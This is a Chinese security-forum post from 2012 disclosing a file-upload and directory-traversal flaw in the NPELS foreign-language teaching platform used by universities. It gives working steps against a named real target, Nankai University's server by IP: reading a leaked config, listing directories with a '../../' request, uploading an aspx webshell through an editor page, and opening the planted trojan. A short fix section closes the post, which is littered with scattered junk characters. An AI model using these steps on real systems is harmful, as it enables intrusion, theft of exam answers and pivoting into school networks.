找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2259|回复: 0
打印 上一主题 下一主题

新理念外语网络教学平台文件上传漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-4 11:10:29 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
好多大学都在用这个教学平台,这个漏洞会导致直接拿到试题答案,甚至作为跳板继续渗透进入学校其他服务器中
* {% G# ]$ y1 [# b$ ~2 b- N- r
5 _! r% R+ i; m: F3 c详细说明:
0 K7 v$ k! Z" j( A, o6 t( ?3 u; Z7 @) z
) [$ q. N( N- ~/ ?7 q以南开大学的为例:
4 L& F0 {2 Q0 _, ~http://222.30.60.3/NPELS
* {, F. k' O, a; C5 L+ WNPELS_LearningCenter_5.0 客户端下的 Update.exe.config 文件泄露一个重要地址5 @1 Z0 Z  R( E1 ^8 Y
<setting name="Update_CommonSvr_CommonService" serializeAs="String">
% ~  b$ E  y; c- j<value>http://222.30.60.3/NPELS/CommonService.asmx</value>7 o$ I+ T% h% D& ~( B
</setting>% c4 i/ c# q0 R) u4 }$ y
及版本号. p: _) a4 p& N. K. A1 I) i( z4 Z
<add key="TVersion" value="1, 0, 0, 2187">
: ]- Y7 t0 ?& G) U. u</add>
0 a. r$ v  m3 F( a直接访问
+ w2 F3 d! K" s2 y/ y0 x$ Shttp://222.30.60.3/NPELS/CommonService.asmx
" F5 N- j$ }* C- f使用GetTestClientFileList操作,直接 HTTP GET 列目录:3 T2 a+ p: s1 o0 M
http://222.30.60.3/NPELS/CommonS ... tFileList?version=1, 0, 0, 2187; W- F. |3 v: V8 C& Z$ @
进一步列目录(返回的网页很大,可以直接 wget 下来)0 Q! H& {* `8 _0 |. o9 _
http://222.30.60.3/NPELS/CommonS ... List?version=../../
! \. i  z3 m9 \" N( R
/ H' L; A9 f+ \& m0 [5 J发现
1 ~' G; s+ |9 s* r0 M% s4 dhttp://zzxx.nankai.edu.cn/npelsv/editor/editor.htm& S) y% P* D9 H1 M$ Y& D9 \* _0 v
可以上传,直接上传aspx木马即可,不需要改后缀名或者文件头
+ |- M* q6 n9 w: o+ ]; Q8 p上传后继续列目录找到木马地址直接访问即可0 `2 |# d4 o  X9 x+ h

$ j6 ~0 p% B" JOOXX/ P: e) [# s+ }7 f4 o

+ Y' Y  n. ]" [& q' W6 @% H; k9 }Google "新理念外语网络教学平台" 测试了几个其他的站,都有类似的列目录上传方法
$ l- L3 I& X1 l" g' J7 G" V' D$ N漏洞证明:$ y% }  F* s- g* `$ E+ ~
: l% b, q! i8 u0 z
列目录:
1 K& o/ g9 d( |" p: Uhttp://222.30.60.3/NPELS/CommonS ... List?version=../../# j% v5 {+ k8 M9 d9 B2 O* H7 ?
文件上传:( J1 m7 ?+ D8 ~* \8 C( ?! ?5 Y8 D
http://222.30.60.3/npelsv/editor/editor.htm0 g; X) q" i1 s2 @- ?: k/ _

) A) ]* P+ m. l+ E% ~上传木马:8 M: U7 N6 \/ t$ b2 T  Y/ t
http://222.30.60.3/npelsv/editor/uploadfiles/1.aspx
; L, c6 |8 G; m" ^
3 U8 D+ U9 ^- j* u+ B修复方案:) F* ?5 ^6 K2 h
好像考试系统必须使用 CommonService.asmx
: }& X2 Y$ S) U0 [/ L最好配置文件加密或者用别的方式不让它泄露出来
& P% C, `2 T. d4 V7 w- A$ O并且检查或删除各上传入口,像 http://222.30.60.3/NPELS/Upload.aspx 一样​+ {- o! J  }& Z5 }  W& H# v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表